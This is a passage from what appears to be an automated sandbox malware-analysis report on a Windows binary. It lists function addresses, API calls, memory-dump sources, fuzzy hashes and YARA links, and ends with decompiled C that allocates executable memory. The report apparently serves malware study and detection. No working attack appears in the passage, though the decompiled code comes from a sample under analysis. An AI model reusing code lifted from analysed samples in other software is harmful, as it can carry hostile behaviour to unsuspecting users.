						return 0;
					}
				}
			}





                                                                                                                        0x6f33b4c3
                                                                                                                        0x6f33b4c8
                                                                                                                        0x6f33b4ce
                                                                                                                        0x6f33b503
                                                                                                                        0x6f33b50b
                                                                                                                        0x6f33b4d0
                                                                                                                        0x6f33b4d3
                                                                                                                        0x6f33b4d9
                                                                                                                        0x6f33b4e0
                                                                                                                        0x6f33b4f5
                                                                                                                        0x6f33b4fd
                                                                                                                        0x6f33b4e2
                                                                                                                        0x6f33b4e2
                                                                                                                        0x6f33b4e7
                                                                                                                        0x6f33b4ef
                                                                                                                        0x6f33b4ef
                                                                                                                        0x6f33b4e0

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B472
                                                                                                                          • Part of subcall function 6F33B460: Sleep.KERNEL32(00000001,00000001,?,00000001,?,?,?,?,?,6F331FE4,00000000,?,?), ref: 6F33B48B
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B497
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000100,6F338CDE), ref: 6F33B4D3
                                                                                                                          • Part of subcall function 6F33B4B0: InterlockedExchange.KERNEL32(6F340620,00000000), ref: 6F33B4B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare$CreateHeapSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1766302375-0
                                                                                                                        • Opcode ID: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction ID: 047d3a78ef540c62b6ab8bdcb2a699144b53fbad22efb848229d2734342f84bf
                                                                                                                        • Opcode Fuzzy Hash: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction Fuzzy Hash: 2BE04F33F05EB906DA11F7B578006DA65888F4266AB070069EA888A384CF2C884143E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BC368, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BC36F
                                                                                                                          • Part of subcall function 004BC301: __EH_prolog3.LIBCMT ref: 004BC308
                                                                                                                          • Part of subcall function 00527E30: GetProcessHeap.KERNEL32(00000000,?), ref: 00527E8B
                                                                                                                          • Part of subcall function 00527E30: HeapFree.KERNEL32(00000000), ref: 00527E92
                                                                                                                          • Part of subcall function 00527E30: CloseHandle.KERNEL32(00000000,2F9F5BE6,?), ref: 00527EAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3Heap$CloseFreeHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2237233628-0
                                                                                                                        • Opcode ID: b94c6a7d745b3c942ffc38a190a5a391f5cda281c44e13645df42817078742ca
                                                                                                                        • Instruction ID: 209209451c21b5cddf03531f89edf6ca80b6ad476668c8cdd2283f35af5c5385
                                                                                                                        • Opcode Fuzzy Hash: b94c6a7d745b3c942ffc38a190a5a391f5cda281c44e13645df42817078742ca
                                                                                                                        • Instruction Fuzzy Hash: 1EF03A70D0030A9BDB14EFA5C55A7AEFBB0BF04320F60465DE461632D1DBB46B048B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0049B3B4, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B3BB
                                                                                                                          • Part of subcall function 0049B386: __EH_prolog3.LIBCMT ref: 0049B38D
                                                                                                                          • Part of subcall function 004805F4: _memset.LIBCMT ref: 004805FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1193784468-0
                                                                                                                        • Opcode ID: cd09ec4ddb4870c27dd878fc56890092b079c571b9d7e3d7ec2cfd620327f691
                                                                                                                        • Instruction ID: fa9d04b3dbe53ae86735a311f774f0395b11d0f6df2606da8e53882a1c4cb9d6
                                                                                                                        • Opcode Fuzzy Hash: cd09ec4ddb4870c27dd878fc56890092b079c571b9d7e3d7ec2cfd620327f691
                                                                                                                        • Instruction Fuzzy Hash: 12F0153291001AEFDF16AF90CC0AAADBF72FF04324F108419B6156A1A2EB366924DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B9491, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004B949B
                                                                                                                          • Part of subcall function 004B902E: SHGetSpecialFolderLocation.SHELL32(00000000,?,?,00000000,?,?,004B94BF,?,?), ref: 004B903D
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalFolderH_prolog3H_prolog3_InitializeLocationSectionSpecial
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1273162838-0
                                                                                                                        • Opcode ID: a5cf82c794dc4e68c07aaf86fb3688aa6a554830d5b81a80d7566a1478186641
                                                                                                                        • Instruction ID: 00e57ea708a7792db819e56979fb549d9e32ee91a0c6928c4b2864d3c6500dea
                                                                                                                        • Opcode Fuzzy Hash: a5cf82c794dc4e68c07aaf86fb3688aa6a554830d5b81a80d7566a1478186641
                                                                                                                        • Instruction Fuzzy Hash: 59E06D7598012CABEF50EB40C80A7DC7774EB14315F1040C9E508AB181CB786F858F95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F6CA2, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F6CA9
                                                                                                                          • Part of subcall function 004858F2: __EH_prolog3.LIBCMT ref: 004858F9
                                                                                                                          • Part of subcall function 0049B3B4: __EH_prolog3.LIBCMT ref: 0049B3BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: 7a238984db68e61e14f51f601d16fa293b24a88dd95786b27dec38aeb5a80839
                                                                                                                        • Instruction ID: 6ba64deeddd1ae59ad76063fce4da21002f6feec93b56d55d08becc609e30086
                                                                                                                        • Opcode Fuzzy Hash: 7a238984db68e61e14f51f601d16fa293b24a88dd95786b27dec38aeb5a80839
                                                                                                                        • Instruction Fuzzy Hash: D8E0C2B09006299BDF21BF54880574CBE31FF44731F10421EFA54672C1CB780B00CB88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B9387, Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004B93A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleInternet
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1081599783-0
                                                                                                                        • Opcode ID: 62d1d8e80c1d42f9567bc01c2eff2b96fa6d66a9f9cf5245e05d61006443d228
                                                                                                                        • Instruction ID: be48d853e61d751395bcb1c43f93eaa7e6359bbeeff9718be07326a7be7b9600
                                                                                                                        • Opcode Fuzzy Hash: 62d1d8e80c1d42f9567bc01c2eff2b96fa6d66a9f9cf5245e05d61006443d228
                                                                                                                        • Instruction Fuzzy Hash: AAD09E755142119BDB209F58E844B9673E8AF44751B11480DE5C0D7251C778EC418B54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0049B386, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B38D
                                                                                                                          • Part of subcall function 0049B32E: __EH_prolog3.LIBCMT ref: 0049B335
                                                                                                                          • Part of subcall function 0049B32E: CryptGenRandom.ADVAPI32(?,?,?,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?,0000000C,004F6CCF,?,?), ref: 0049B348
                                                                                                                          • Part of subcall function 0049B32E: __CxxThrowException@8.LIBCMT ref: 0049B379
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CryptException@8RandomThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3670306203-0
                                                                                                                        • Opcode ID: ca36afae9db2cf58193730346521e817ff3285876022af0aca717bf013cc7e3a
                                                                                                                        • Instruction ID: bf56014202067d8055c103ed3f8baa7151a3cdec1537bc46ceae62ec0e038ae6
                                                                                                                        • Opcode Fuzzy Hash: ca36afae9db2cf58193730346521e817ff3285876022af0aca717bf013cc7e3a
                                                                                                                        • Instruction Fuzzy Hash: F9D0C97480011AEADF01EFD4C91ABADBF71FF44308F408428B614AA292CB755A08DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D82A9, Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCloseKey.KERNEL32(?,?,004C2136,?,008326C4), ref: 004D82AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: da5f33b3cf6d96f551713abdd59cbd5d0860e8efd2832817ac9cade17e9be35a
                                                                                                                        • Instruction ID: 69603484279da66ae7ba95a0f5b7a5d0fecd8c781cd9d1ea75d222655bde9f33
                                                                                                                        • Opcode Fuzzy Hash: da5f33b3cf6d96f551713abdd59cbd5d0860e8efd2832817ac9cade17e9be35a
                                                                                                                        • Instruction Fuzzy Hash: B0B092320246208BE7351F06F8497D2B7B5AB20222F01065AE0424A571D6AA6DDA9BD4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0053742F, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __fsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3646066109-0
                                                                                                                        • Opcode ID: 2944bcf569b94e2b44a73485ac56fc0f61e1c0f057e6f4bc3992d41405ae1331
                                                                                                                        • Instruction ID: 3abcb2526eb90f35fc7cd3321344e052b6764503d5ee836da5a1f4e353846954
                                                                                                                        • Opcode Fuzzy Hash: 2944bcf569b94e2b44a73485ac56fc0f61e1c0f057e6f4bc3992d41405ae1331
                                                                                                                        • Instruction Fuzzy Hash: 25B012B580C200BECA111600AC02B097B517BC4710F90C814BB5C1016092369124AE0B
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00527610, Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005272A0: WaitForSingleObject.KERNEL32 ref: 005272EE
                                                                                                                          • Part of subcall function 005272A0: ReleaseMutex.KERNEL32(00000000), ref: 00527312
                                                                                                                          • Part of subcall function 005272A0: CloseHandle.KERNEL32(00000000), ref: 0052732A
                                                                                                                        • TlsSetValue.KERNEL32(00000032,?), ref: 00527655
                                                                                                                          • Part of subcall function 00527490: TlsSetValue.KERNEL32(00000032,00000000), ref: 00527507
                                                                                                                          • Part of subcall function 00527490: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00527532
                                                                                                                          • Part of subcall function 00527490: HeapFree.KERNEL32(00000000), ref: 00527539
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapValue$CloseFreeHandleMutexObjectProcessReleaseSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2825495486-0
                                                                                                                        • Opcode ID: ff859620a0cf7f612666589844352bc59dac50a22ad6e30f6a4476544e8e6d44
                                                                                                                        • Instruction ID: 41a6373704d868df6cdd66b7c0d071a2566b67ca7d946b786b2b8bb785c91257
                                                                                                                        • Opcode Fuzzy Hash: ff859620a0cf7f612666589844352bc59dac50a22ad6e30f6a4476544e8e6d44
                                                                                                                        • Instruction Fuzzy Hash: 2B018B72A04218AFCB10DF99ED45B5ABBE8FB49761F10422AF824D3780D77669008AA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A590, Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A590() {
				void* _t7;
				intOrPtr* _t8;
				void _t9;
				void* _t11;

				_t7 =  *0x6f34095c; // 0x26b0000
				if(_t7 == 0) {
					L4:
					_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
					if(_t7 != 0) {
						_t2 = _t7 + 0x20; // 0x20
						_t8 = _t2;
						 *((intOrPtr*)(_t7 + 4)) = 0;
						 *((intOrPtr*)(_t7 + 8)) = 0;
						_t11 = _t8 - _t7;
						do {
							 *_t8 =  *((intOrPtr*)(_t7 + 4));
							 *((intOrPtr*)(_t7 + 4)) = _t8;
							_t11 = _t11 + 0x20;
							_t8 = _t8 + 0x20;
						} while (_t11 <= 0xfe0);
						_t9 =  *0x6f34095c; // 0x26b0000
						 *_t7 = _t9;
						 *0x6f34095c = _t7;
						return _t7;
